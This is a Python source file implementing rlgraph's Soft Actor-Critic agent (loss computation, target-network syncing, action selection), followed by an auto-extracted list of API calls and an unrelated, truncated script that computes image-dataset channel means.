@rlgraph_api(must_be_complete=False)
def set_q_weights(self, q_weights):
split_weights = self._q_vars_splitter.call(q_weights)
assert len(split_weights) == len(self._q_functions)
update_ops = [q.sync(q_weights) for q_weights, q in zip(split_weights, self._q_functions)]
update_ops.extend([q.sync(q_weights) for q_weights, q in zip(split_weights, self._target_q_functions)])
return tuple(update_ops)
"""
@rlgraph_api
def preprocess_states(self, states):
return self._preprocessor.preprocess(states)
@rlgraph_api
def insert_records(self, preprocessed_states, env_actions, rewards, next_states, terminals):
records = self._merger.merge(preprocessed_states, env_actions, rewards, next_states, terminals)
return self._memory.insert_records(records)
@rlgraph_api
def update_from_memory(self, batch_size=64, time_percentage=None):
records, sample_indices, importance_weights = self._memory.get_records(batch_size)
result = self.update_from_external_batch(
records["states"], records["actions"], records["rewards"], records["terminals"],
records["next_states"], importance_weights, time_percentage
)
if isinstance(self._memory, PrioritizedReplay):
update_pr_step_op = self._memory.update_records(sample_indices, result["critic_loss_per_item"])
result["update_pr_step_op"] = update_pr_step_op
return result
@rlgraph_api
def update_from_external_batch(
self, preprocessed_states, env_actions, rewards, terminals, next_states, importance_weights,
time_percentage=None
):
actions = self._graph_fn_one_hot(env_actions)
actor_loss, actor_loss_per_item, critic_loss, critic_loss_per_item, alpha_loss, alpha_loss_per_item = \
self.get_losses(preprocessed_states, actions, rewards, terminals, next_states, importance_weights)
policy_vars = self._policy.variables()
q_vars = [q_func.variables() for q_func in self._q_functions]
merged_q_vars = self._q_vars_merger.merge(*q_vars)
critic_step_op = self.vf_optimizer.step(merged_q_vars, critic_loss, critic_loss_per_item, time_percentage)
actor_step_op = self._optimizer.step(policy_vars, actor_loss, actor_loss_per_item, time_percentage)
if self.target_entropy is not None:
alpha_step_op = self._graph_fn_update_alpha(alpha_loss, alpha_loss_per_item, time_percentage)
else:
alpha_step_op = self._graph_fn_no_op()
# TODO: optimizer for alpha
sync_op = self.sync_targets()
# Increase the global training step counter.
alpha_step_op = self._graph_fn_training_step(alpha_step_op)
return dict(
actor_step_op=actor_step_op,
critic_step_op=critic_step_op,
sync_op=sync_op,
alpha_step_op=alpha_step_op,
actor_loss=actor_loss,
actor_loss_per_item=actor_loss_per_item,
critic_loss=critic_loss,
critic_loss_per_item=critic_loss_per_item,
alpha_loss=alpha_loss,
alpha_loss_per_item=alpha_loss_per_item
)
@graph_fn(flatten_ops=True, split_ops=True, add_auto_key_as_first_param=True)
def _graph_fn_one_hot(self, key, env_actions):
if isinstance(self.env_action_space[key], IntBox):
env_actions = tf.one_hot(env_actions, depth=self.env_action_space[key].num_categories, axis=-1)
return env_actions
@graph_fn(requires_variable_completeness=True)
def _graph_fn_update_alpha(self, alpha_loss, alpha_loss_per_item, time_percentage=None):
alpha_step_op = self.alpha_optimizer.step(
DataOpTuple([self.log_alpha]), alpha_loss, alpha_loss_per_item, time_percentage
)
return alpha_step_op
@rlgraph_api # `returns` are determined in ctor
def _graph_fn_get_q_values(self, preprocessed_states, actions, target=False):
backend = get_backend()
flat_actions = flatten_op(actions)
actions = []
for flat_key, action_component in self._policy.action_space.flatten().items():
actions.append(flat_actions[flat_key])
if backend == "tf":
actions = tf.concat(actions, axis=-1)
elif backend == "pytorch":
actions = torch.cat(actions, dim=-1)
q_funcs = self._q_functions if target is False else self._target_q_functions
# We do not concat states yet because we might pass states through a conv stack before merging it
# with actions.
return tuple(q.state_action_value(preprocessed_states, actions) for q in q_funcs)
@rlgraph_api
def get_losses(self, preprocessed_states, actions, rewards, terminals, next_states, importance_weights):
# TODO: internal states
samples_next = self._policy.get_action_and_log_likelihood(next_states, deterministic=False)
next_sampled_actions = samples_next["action"]
log_probs_next_sampled = samples_next["log_likelihood"]
q_values_next_sampled = self.get_q_values(
next_states, next_sampled_actions, target=True
)
q_values = self.get_q_values(preprocessed_states, actions)
samples = self._policy.get_action_and_log_likelihood(preprocessed_states, deterministic=False)
sampled_actions = samples["action"]
log_probs_sampled = samples["log_likelihood"]
q_values_sampled = self.get_q_values(preprocessed_states, sampled_actions)
alpha = self._graph_fn_compute_alpha()
return self.loss_function.loss(
alpha,
log_probs_next_sampled,
q_values_next_sampled,
q_values,
log_probs_sampled,
q_values_sampled,
rewards,
terminals
)
@rlgraph_api
def get_preprocessed_state_and_action(self, states, deterministic=False):
preprocessed_states = self._preprocessor.preprocess(states)
return self.action_from_preprocessed_state(preprocessed_states, deterministic)
@rlgraph_api
def action_from_preprocessed_state(self, preprocessed_states, deterministic=False):
out = self._policy.get_action(preprocessed_states, deterministic=deterministic)
return out["action"], preprocessed_states
@rlgraph_api(requires_variable_completeness=True)
def reset_targets(self):
ops = (target_q.sync(q.variables()) for q, target_q in zip(self._q_functions, self._target_q_functions))
return tuple(ops)
@rlgraph_api(requires_variable_completeness=True)
def sync_targets(self):
should_sync = self._graph_fn_get_should_sync()
return self._graph_fn_sync(should_sync)
@rlgraph_api
def get_memory_size(self):
return self._memory.get_size()
@graph_fn
def _graph_fn_compute_alpha(self):
backend = get_backend()
if backend == "tf":
return tf.exp(self.log_alpha)
elif backend == "pytorch":
return torch.exp(self.log_alpha)
# TODO: Move this into generic AgentRootComponent.
@graph_fn
def _graph_fn_training_step(self, other_step_op=None):
if self.agent is not None:
add_op = tf.assign_add(self.agent.graph_executor.global_training_timestep, 1)
op_list = [add_op] + [other_step_op] if other_step_op is not None else []
with tf.control_dependencies(op_list):
return tf.no_op() if other_step_op is None else other_step_op
else:
return tf.no_op() if other_step_op is None else other_step_op
@graph_fn(returns=1, requires_variable_completeness=True)
def _graph_fn_get_should_sync(self):
if get_backend() == "tf":
inc_op = tf.assign_add(self.steps_since_last_sync, 1)
should_sync = inc_op >= self.q_sync_spec.sync_interval
def reset_op():
op = tf.assign(self.steps_since_last_sync, 0)
with tf.control_dependencies([op]):
return tf.no_op()
sync_op = tf.cond(
pred=inc_op >= self.q_sync_spec.sync_interval,
true_fn=reset_op,
false_fn=tf.no_op
)
with tf.control_dependencies([sync_op]):
return tf.identity(should_sync)
else:
raise NotImplementedError("TODO")
@graph_fn(returns=1, requires_variable_completeness=True)
def _graph_fn_sync(self, should_sync):
assign_ops = []
tau = self.q_sync_spec.sync_tau
if tau != 1.0:
all_source_vars = [source.get_variables(collections=None, custom_scope_separator="-") for source in self._q_functions]
all_dest_vars = [destination.get_variables(collections=None, custom_scope_separator="-") for destination in self._target_q_functions]
for source_vars, dest_vars in zip(all_source_vars, all_dest_vars):
for (source_key, source_var), (dest_key, dest_var) in zip(sorted(source_vars.items()), sorted(dest_vars.items())):
assign_ops.append(tf.assign(dest_var, tau * source_var + (1.0 - tau) * dest_var))
else:
all_source_vars = [source.variables() for source in self._q_functions]
for source_vars, destination in zip(all_source_vars, self._target_q_functions):
assign_ops.append(destination.sync(source_vars))
assert len(assign_ops) > 0
grouped_op = tf.group(assign_ops)
def assign_op():
# Make sure we are returning no_op as opposed to reference
with tf.control_dependencies([grouped_op]):
return tf.no_op()
cond_assign_op = tf.cond(should_sync, true_fn=assign_op, false_fn=tf.no_op)
with tf.control_dependencies([cond_assign_op]):
return tf.no_op()
@graph_fn
def _graph_fn_no_op(self):
return tf.no_op()
@rlgraph_api
def get_global_timestep(self):
return self.read_variable(self.agent.graph_executor.global_timestep)
@rlgraph_api
def _graph_fn_update_global_timestep(self, increment):
if get_backend() == "tf":
add_op = tf.assign_add(self.agent.graph_executor.global_timestep, increment)
return add_op
elif get_backend == "pytorch":
self.agent.graph_executor.global_timestep += increment
return self.agent.graph_executor.global_timestep
@rlgraph_api
def _graph_fn_get_episode_reward(self):
return self.episode_reward
@rlgraph_api
def _graph_fn_set_episode_reward(self, episode_reward):
return tf.assign(self.episode_reward, episode_reward)
class SACAgent(Agent):
def __init__(
self,
state_space,
action_space,
discount=0.98,
preprocessing_spec=None,
network_spec=None,
internal_states_space=None,
policy_spec=None,
value_function_spec=None,
execution_spec=None,
optimizer_spec=None,
value_function_optimizer_spec=None,
observe_spec=None,
update_spec=None,
summary_spec=None,
saver_spec=None,
auto_build=True,
name="sac-agent",
double_q=True,
initial_alpha=1.0,
gumbel_softmax_temperature=1.0,
target_entropy=None,
memory_spec=None,
value_function_sync_spec=None
):
"""
This is an implementation of the Soft-Actor Critic algorithm.
Paper: http://arxiv.org/abs/1801.01290
Args:
state_space (Union[dict,Space]): Spec dict for the state Space or a direct Space object.
action_space (Union[dict,Space]): Spec dict for the action Space or a direct Space object.
preprocessing_spec (Optional[list,PreprocessorStack]): The spec list for the different necessary states
preprocessing steps or a PreprocessorStack object itself.
discount (float): The discount factor (gamma).
network_spec (Optional[list,NeuralNetwork]): Spec list for a NeuralNetwork Component or the NeuralNetwork
object itself.
internal_states_space (Optional[Union[dict,Space]]): Spec dict for the internal-states Space or a direct
Space object for the Space(s) of the internal (RNN) states.
policy_spec (Optional[dict]): An optional dict for further kwargs passing into the Policy c'tor.
value_function_spec (list, dict, ValueFunction): Neural network specification for baseline or instance
of ValueFunction.
execution_spec (Optional[dict,Execution]): The spec-dict specifying execution settings.
optimizer_spec (Optional[dict,Optimizer]): The spec-dict to create the Optimizer for this Agent.
value_function_optimizer_spec (dict): Optimizer config for value function optimizer. If None, the optimizer
spec for the policy is used (same learning rate and optimizer type).
observe_spec (Optional[dict]): Spec-dict to specify `Agent.observe()` settings.
update_spec (Optional[dict]): Spec-dict to specify `Agent.update()` settings.
summary_spec (Optional[dict]): Spec-dict to specify summary settings.
saver_spec (Optional[dict]): Spec-dict to specify saver settings.
auto_build (Optional[bool]): If True (default), immediately builds the graph using the agent's
graph builder. If false, users must separately call agent.build(). Useful for debugging or analyzing
components before building.
name (str): Some name for this Agent object.
double_q (bool): Whether to train two q networks independently.
initial_alpha (float): "The temperature parameter α determines the
relative importance of the entropy term against the reward".
gumbel_softmax_temperature (float): Temperature parameter for the Gumbel-Softmax distribution used
for discrete actions.
memory_spec (Optional[dict,Memory]): The spec for the Memory to use for the DQN algorithm.
update_spec (dict): Here we can have sync_interval or sync_tau (for the value network update).
"""
# If VF spec is a network spec, wrap with SAC vf type. The VF must concatenate actions and states,
# which can require splitting the network in the case of e.g. conv-inputs.
if isinstance(value_function_spec, list):
value_function_spec = dict(type="sac_value_function", network_spec=value_function_spec)
self.logger.info("Using default SAC value function.")
elif isinstance(value_function_spec, ValueFunction):
self.logger.info("Using value function object {}".format(ValueFunction))
if policy_spec is None:
# Continuous action space: Use squashed normal.
# Discrete: Gumbel-softmax.
policy_spec = dict(deterministic=False,
distributions_spec=dict(
bounded_distribution_type="squashed",
discrete_distribution_type="gumbel_softmax",
gumbel_softmax_temperature=gumbel_softmax_temperature
))
super(SACAgent, self).__init__(
state_space=state_space,
action_space=action_space,
discount=discount,
preprocessing_spec=preprocessing_spec,
network_spec=network_spec,
internal_states_space=internal_states_space,
policy_spec=policy_spec,
value_function_spec=value_function_spec,
execution_spec=execution_spec,
optimizer_spec=optimizer_spec,
value_function_optimizer_spec=value_function_optimizer_spec,
observe_spec=observe_spec,
update_spec=update_spec,
summary_spec=summary_spec,
saver_spec=saver_spec,
auto_build=auto_build,
name=name
)
self.double_q = double_q
self.target_entropy = target_entropy
self.initial_alpha = initial_alpha
# Assert that the synch interval is a multiple of the update_interval.
if "sync_interval" in self.update_spec:
if self.update_spec["sync_interval"] / self.update_spec["update_interval"] != \
self.update_spec["sync_interval"] // self.update_spec["update_interval"]:
raise RLGraphError(
"ERROR: sync_interval ({}) must be multiple of update_interval "
"({})!".format(self.update_spec["sync_interval"], self.update_spec["update_interval"])
)
elif "sync_tau" in self.update_spec:
if self.update_spec["sync_tau"] <= 0 or self.update_spec["sync_tau"] > 1.0:
raise RLGraphError(
"sync_tau ({}) must be in interval (0.0, 1.0]!".format(self.update_spec["sync_tau"])
)
else:
self.update_spec["sync_tau"] = 0.005 # The value mentioned in the paper
# Extend input Space definitions to this Agent's specific API-methods.
preprocessed_state_space = self.preprocessed_state_space.with_batch_rank()
reward_space = FloatBox(add_batch_rank=True)
terminal_space = BoolBox(add_batch_rank=True)
#self.iterations = self.update_spec["num_iterations"]
self.batch_size = self.update_spec["batch_size"]
float_action_space = self.action_space.with_batch_rank().map(
mapping=lambda flat_key, space: space.as_one_hot_float_space() if isinstance(space, IntBox) else space
)
self.input_spaces.update(dict(
env_actions=self.action_space.with_batch_rank(),
actions=float_action_space,
preprocessed_states=preprocessed_state_space,
rewards=reward_space,
terminals=terminal_space,
next_states=preprocessed_state_space,
states=self.state_space.with_batch_rank(add_batch_rank=True),
batch_size=int,
importance_weights=FloatBox(add_batch_rank=True),
deterministic=bool,
weights="variables:{}".format(self.policy.scope)
))
if value_function_sync_spec is None:
value_function_sync_spec = SyncSpecification(
sync_interval=self.update_spec["sync_interval"] // self.update_spec["update_interval"],
sync_tau=self.update_spec["sync_tau"] if "sync_tau" in self.update_spec else 5e-3
)
self.memory = Memory.from_spec(memory_spec)
self.alpha_optimizer = self.optimizer.copy(scope="alpha-" + self.optimizer.scope) if self.target_entropy is not None else None
self.root_component = SACAgentComponent(
agent=self,
policy=self.policy,
q_function=self.value_function,
preprocessor=self.preprocessor,
memory=self.memory,
discount=self.discount,
initial_alpha=self.initial_alpha,
target_entropy=target_entropy,
optimizer=self.optimizer,
vf_optimizer=self.value_function_optimizer,
alpha_optimizer=self.alpha_optimizer,
q_sync_spec=value_function_sync_spec,
num_q_functions=2 if self.double_q is True else 1
)
extra_optimizers = [self.value_function_optimizer]
if self.alpha_optimizer is not None:
extra_optimizers.append(self.alpha_optimizer)
self.build_options = dict(optimizers=extra_optimizers)
if self.auto_build:
self._build_graph(
[self.root_component], self.input_spaces, optimizer=self.optimizer,
batch_size=self.update_spec["batch_size"],
build_options=self.build_options
)
self.graph_built = True
def set_weights(self, policy_weights, value_function_weights=None):
# TODO: Overrides parent but should this be policy of value function?
return self.graph_executor.execute((self.root_component.set_policy_weights, policy_weights))
def get_weights(self):
return dict(policy_weights=self.graph_executor.execute(self.root_component.get_policy_weights))
def get_action(self, states, internals=None, use_exploration=True, apply_preprocessing=True, extra_returns=None,
time_percentage=None):
# TODO: common pattern - move to Agent
"""
Args:
extra_returns (Optional[Set[str],str]): Optional string or set of strings for additional return
values (besides the actions). Possible values are:
- 'preprocessed_states': The preprocessed states after passing the given states through the
preprocessor stack.
- 'internal_states': The internal states returned by the RNNs in the NN pipeline.
- 'used_exploration': Whether epsilon- or noise-based exploration was used or not.
Returns:
tuple or single value depending on `extra_returns`:
- action
- the preprocessed states
"""
extra_returns = {extra_returns} if isinstance(extra_returns, str) else (extra_returns or set())
# States come in without preprocessing -> use state space.
if apply_preprocessing:
call_method = self.root_component.get_preprocessed_state_and_action
batched_states, remove_batch_rank = self.state_space.force_batch(states)
else:
call_method = self.root_component.action_from_preprocessed_state
batched_states = states
remove_batch_rank = False
#remove_batch_rank = batched_states.ndim == np.asarray(states).ndim + 1
# Increase timesteps by the batch size (number of states in batch).
batch_size = len(batched_states)
self.timesteps += batch_size
# Control, which return value to "pull" (depending on `additional_returns`).
return_ops = [0, 1] if "preprocessed_states" in extra_returns else [0]
ret = force_list(self.graph_executor.execute((
call_method,
[batched_states, not use_exploration], # deterministic = not use_exploration
# 0=preprocessed_states, 1=action
return_ops
)))
# Convert Gumble (relaxed one-hot) sample back into int type for all discrete composite actions.
if isinstance(self.action_space, ContainerSpace):
ret[0] = ret[0].map(
mapping=lambda key, action: np.argmax(action, axis=-1).astype(action.dtype)
if isinstance(self.flat_action_space[key], IntBox) else action
)
elif isinstance(self.action_space, IntBox):
ret[0] = np.argmax(ret[0], axis=-1).astype(self.action_space.dtype)
if remove_batch_rank:
ret[0] = strip_list(ret[0])
if "preprocessed_states" in extra_returns:
return ret[0], ret[1]
else:
return ret[0]
def _observe_graph(self, preprocessed_states, actions, internals, rewards, next_states, terminals):
self.graph_executor.execute((self.root_component.insert_records, [preprocessed_states, actions, rewards, next_states, terminals]))
def update(self, batch=None, time_percentage=None, **kwargs):
if batch is None:
size = self.graph_executor.execute(self.root_component.get_memory_size)
# TODO: is this necessary?
if size < self.batch_size:
return 0.0, 0.0, 0.0
ret = self.graph_executor.execute((self.root_component.update_from_memory, [self.batch_size, time_percentage]))
else:
ret = self.graph_executor.execute((self.root_component.update_from_external_batch, [
batch["states"], batch["actions"], batch["rewards"], batch["terminals"], batch["next_states"],
batch["importance_weights"], time_percentage
]))
return ret["actor_loss"], ret["actor_loss_per_item"], ret["critic_loss"], ret["alpha_loss"]
def reset(self):
"""
Resets our preprocessor, but only if it contains stateful PreprocessLayer Components (meaning
the PreprocessorStack has at least one variable defined).
"""
if self.preprocessing_required and len(self.preprocessor.variables) > 0:
self.graph_executor.execute("reset_preprocessor")
self.graph_executor.execute(self.root_component.reset_targets)
def __repr__(self):
return "SACAgent(double-q={}, initial-alpha={}, target-entropy={})".format(
self.double_q, self.initial_alpha, self.target_entropy
)
|
[
"tensorflow.cond",
"numpy.argmax",
"tensorflow.identity",
"rlgraph.get_backend",
"torch.cat",
"tensorflow.assign",
"tensorflow.one_hot",
"rlgraph.components.ContainerMerger",
"tensorflow.concat",
"tensorflow.no_op",
"torch.exp",
"tensorflow.exp",
"rlgraph.spaces.BoolBox",
"rlgraph.utils.decorators.graph_fn",
"tensorflow.control_dependencies",
"rlgraph.spaces.space_utils.sanity_check_space",
"rlgraph.utils.decorators.rlgraph_api",
"tensorflow.assign_add",
"tensorflow.group",
"rlgraph.components.Memory.from_spec",
"rlgraph.spaces.FloatBox",
"rlgraph.utils.ops.flatten_op",
"rlgraph.components.Synchronizable",
"numpy.log",
"rlgraph.components.loss_functions.sac_loss_function.SACLossFunction",
"rlgraph.utils.ops.DataOpTuple",
"rlgraph.utils.util.strip_list"
] |
[((1376, 1389), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (1387, 1389), False, 'from rlgraph import get_backend\n'), ((5665, 5700), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'must_be_complete': '(False)'}), '(must_be_complete=False)\n', (5676, 5700), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((9067, 9143), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'flatten_ops': '(True)', 'split_ops': '(True)', 'add_auto_key_as_first_param': '(True)'}), '(flatten_ops=True, split_ops=True, add_auto_key_as_first_param=True)\n', (9075, 9143), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((9395, 9440), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (9403, 9440), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((12222, 12270), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (12233, 12270), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((12445, 12493), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (12456, 12493), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((13512, 13568), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'returns': '(1)', 'requires_variable_completeness': '(True)'}), '(returns=1, requires_variable_completeness=True)\n', (13520, 13568), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((14302, 14358), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'returns': '(1)', 'requires_variable_completeness': '(True)'}), '(returns=1, requires_variable_completeness=True)\n', (14310, 14358), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((1432, 1445), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (1443, 1445), False, 'from rlgraph import get_backend\n'), ((3710, 3812), 'rlgraph.components.loss_functions.sac_loss_function.SACLossFunction', 'SACLossFunction', ([], {'target_entropy': 'target_entropy', 'discount': 'discount', 'num_q_functions': 'num_q_functions'}), '(target_entropy=target_entropy, discount=discount,\n num_q_functions=num_q_functions)\n', (3725, 3812), False, 'from rlgraph.components.loss_functions.sac_loss_function import SACLossFunction\n'), ((3962, 3992), 'rlgraph.components.ContainerMerger', 'ContainerMerger', (['*memory_items'], {}), '(*memory_items)\n', (3977, 3992), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((4100, 4148), 'rlgraph.components.ContainerMerger', 'ContainerMerger', (['*q_names'], {'scope': '"""q_vars_merger"""'}), "(*q_names, scope='q_vars_merger')\n", (4115, 4148), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((9870, 9883), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (9881, 9883), False, 'from rlgraph import get_backend\n'), ((9908, 9927), 'rlgraph.utils.ops.flatten_op', 'flatten_op', (['actions'], {}), '(actions)\n', (9918, 9927), False, 'from rlgraph.utils.ops import flatten_op, DataOpTuple\n'), ((12785, 12798), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (12796, 12798), False, 'from rlgraph import get_backend\n'), ((15388, 15408), 'tensorflow.group', 'tf.group', (['assign_ops'], {}), '(assign_ops)\n', (15396, 15408), True, 'import tensorflow as tf\n'), ((15622, 15680), 'tensorflow.cond', 'tf.cond', (['should_sync'], {'true_fn': 'assign_op', 'false_fn': 'tf.no_op'}), '(should_sync, true_fn=assign_op, false_fn=tf.no_op)\n', (15629, 15680), True, 'import tensorflow as tf\n'), ((15828, 15838), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15836, 15838), True, 'import tensorflow as tf\n'), ((16552, 16598), 'tensorflow.assign', 'tf.assign', (['self.episode_reward', 'episode_reward'], {}), '(self.episode_reward, episode_reward)\n', (16561, 16598), True, 'import tensorflow as tf\n'), ((23282, 23311), 'rlgraph.spaces.FloatBox', 'FloatBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (23290, 23311), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((23337, 23365), 'rlgraph.spaces.BoolBox', 'BoolBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (23344, 23365), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((24614, 24643), 'rlgraph.components.Memory.from_spec', 'Memory.from_spec', (['memory_spec'], {}), '(memory_spec)\n', (24630, 24643), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((4882, 4944), 'rlgraph.spaces.space_utils.sanity_check_space', 'sanity_check_space', (['input_spaces[s]'], {'must_have_batch_rank': '(True)'}), '(input_spaces[s], must_have_batch_rank=True)\n', (4900, 4944), False, 'from rlgraph.spaces.space_utils import sanity_check_space\n'), ((9280, 9365), 'tensorflow.one_hot', 'tf.one_hot', (['env_actions'], {'depth': 'self.env_action_space[key].num_categories', 'axis': '(-1)'}), '(env_actions, depth=self.env_action_space[key].num_categories,\n axis=-1)\n', (9290, 9365), True, 'import tensorflow as tf\n'), ((9597, 9626), 'rlgraph.utils.ops.DataOpTuple', 'DataOpTuple', (['[self.log_alpha]'], {}), '([self.log_alpha])\n', (9608, 9626), False, 'from rlgraph.utils.ops import flatten_op, DataOpTuple\n'), ((10138, 10165), 'tensorflow.concat', 'tf.concat', (['actions'], {'axis': '(-1)'}), '(actions, axis=-1)\n', (10147, 10165), True, 'import tensorflow as tf\n'), ((12846, 12868), 'tensorflow.exp', 'tf.exp', (['self.log_alpha'], {}), '(self.log_alpha)\n', (12852, 12868), True, 'import tensorflow as tf\n'), ((13134, 13202), 'tensorflow.assign_add', 'tf.assign_add', (['self.agent.graph_executor.global_training_timestep', '(1)'], {}), '(self.agent.graph_executor.global_training_timestep, 1)\n', (13147, 13202), True, 'import tensorflow as tf\n'), ((13621, 13634), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (13632, 13634), False, 'from rlgraph import get_backend\n'), ((13665, 13709), 'tensorflow.assign_add', 'tf.assign_add', (['self.steps_since_last_sync', '(1)'], {}), '(self.steps_since_last_sync, 1)\n', (13678, 13709), True, 'import tensorflow as tf\n'), ((13981, 14076), 'tensorflow.cond', 'tf.cond', ([], {'pred': '(inc_op >= self.q_sync_spec.sync_interval)', 'true_fn': 'reset_op', 'false_fn': 'tf.no_op'}), '(pred=inc_op >= self.q_sync_spec.sync_interval, true_fn=reset_op,\n false_fn=tf.no_op)\n', (13988, 14076), True, 'import tensorflow as tf\n'), ((15694, 15735), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[cond_assign_op]'], {}), '([cond_assign_op])\n', (15717, 15735), True, 'import tensorflow as tf\n'), ((15756, 15766), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15764, 15766), True, 'import tensorflow as tf\n'), ((16057, 16070), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (16068, 16070), False, 'from rlgraph import get_backend\n'), ((16101, 16168), 'tensorflow.assign_add', 'tf.assign_add', (['self.agent.graph_executor.global_timestep', 'increment'], {}), '(self.agent.graph_executor.global_timestep, increment)\n', (16114, 16168), True, 'import tensorflow as tf\n'), ((28967, 28985), 'rlgraph.utils.util.strip_list', 'strip_list', (['ret[0]'], {}), '(ret[0])\n', (28977, 28985), False, 'from rlgraph.utils.util import strip_list, force_list\n'), ((5273, 5299), 'numpy.log', 'np.log', (['self.initial_alpha'], {}), '(self.initial_alpha)\n', (5279, 5299), True, 'import numpy as np\n'), ((10223, 10249), 'torch.cat', 'torch.cat', (['actions'], {'dim': '(-1)'}), '(actions, dim=-1)\n', (10232, 10249), False, 'import torch\n'), ((12923, 12948), 'torch.exp', 'torch.exp', (['self.log_alpha'], {}), '(self.log_alpha)\n', (12932, 12948), False, 'import torch\n'), ((13306, 13338), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['op_list'], {}), '(op_list)\n', (13329, 13338), True, 'import tensorflow as tf\n'), ((13451, 13461), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13459, 13461), True, 'import tensorflow as tf\n'), ((13827, 13867), 'tensorflow.assign', 'tf.assign', (['self.steps_since_last_sync', '(0)'], {}), '(self.steps_since_last_sync, 0)\n', (13836, 13867), True, 'import tensorflow as tf\n'), ((14152, 14186), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[sync_op]'], {}), '([sync_op])\n', (14175, 14186), True, 'import tensorflow as tf\n'), ((14211, 14235), 'tensorflow.identity', 'tf.identity', (['should_sync'], {}), '(should_sync)\n', (14222, 14235), True, 'import tensorflow as tf\n'), ((15523, 15560), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[grouped_op]'], {}), '([grouped_op])\n', (15546, 15560), True, 'import tensorflow as tf\n'), ((15585, 15595), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15593, 15595), True, 'import tensorflow as tf\n'), ((3041, 3057), 'rlgraph.components.Synchronizable', 'Synchronizable', ([], {}), '()\n', (3055, 3057), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((3401, 3417), 'rlgraph.components.Synchronizable', 'Synchronizable', ([], {}), '()\n', (3415, 3417), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((13363, 13373), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13371, 13373), True, 'import tensorflow as tf\n'), ((13889, 13918), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[op]'], {}), '([op])\n', (13912, 13918), True, 'import tensorflow as tf\n'), ((13947, 13957), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13955, 13957), True, 'import tensorflow as tf\n'), ((24136, 24165), 'rlgraph.spaces.FloatBox', 'FloatBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (24144, 24165), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((15014, 15076), 'tensorflow.assign', 'tf.assign', (['dest_var', '(tau * source_var + (1.0 - tau) * dest_var)'], {}), '(dest_var, tau * source_var + (1.0 - tau) * dest_var)\n', (15023, 15076), True, 'import tensorflow as tf\n'), ((28856, 28882), 'numpy.argmax', 'np.argmax', (['ret[0]'], {'axis': '(-1)'}), '(ret[0], axis=-1)\n', (28865, 28882), True, 'import numpy as np\n'), ((28642, 28668), 'numpy.argmax', 'np.argmax', (['action'], {'axis': '(-1)'}), '(action, axis=-1)\n', (28651, 28668), True, 'import numpy as np\n')]
|
import os
from PIL import Image
import numpy as np
## 图像数据集的均值与方差的计算
root_path = '../train_data'
_filename = os.listdir(root_path)
filename = []
for _file in _filename:
if not _file.endswith('.txt'):
filename.append(_file)
#均值之和
R_channel_m = 0
G_channel_m = 0
B_channel_m = 0
#方差之和
R_channel_s = 0
G_channel_s = 0
B_channel_s = 0
num = len(filename)
for i in range(len(filename)):
img = Image.open(os.path.join(root_path, filename[i]))
img = img.convert('RGB')
img = np.array(img)
img = img[:, :, ::-1] #转换为BGR
img = img.astype(np.float32) / 225
B_channel_m = B_channel_m + np.sum(img[:, :, 0])/(img.shape[0]* img.shape[1])
G_channel_m = G_channel_m + np.sum(img[:, :, 1])/(img.shape[0]* img.shape[1])
R_channel_m = R_channel_m + np.sum(img[:, :, 2])/(img.shape[0]* img.shape[1])
B_mean = B_channel_m / num
G_mean = G_channel_m / num
R_mean = R_channel_m / num
for i in range(len(filename)):
img = Image.open(os.path.join(root_path, filename[i]))
img = img.convert('RGB')
img = np.array(img)
img = img[:, :, ::-1]
img = img.astype(np.float32) / 225
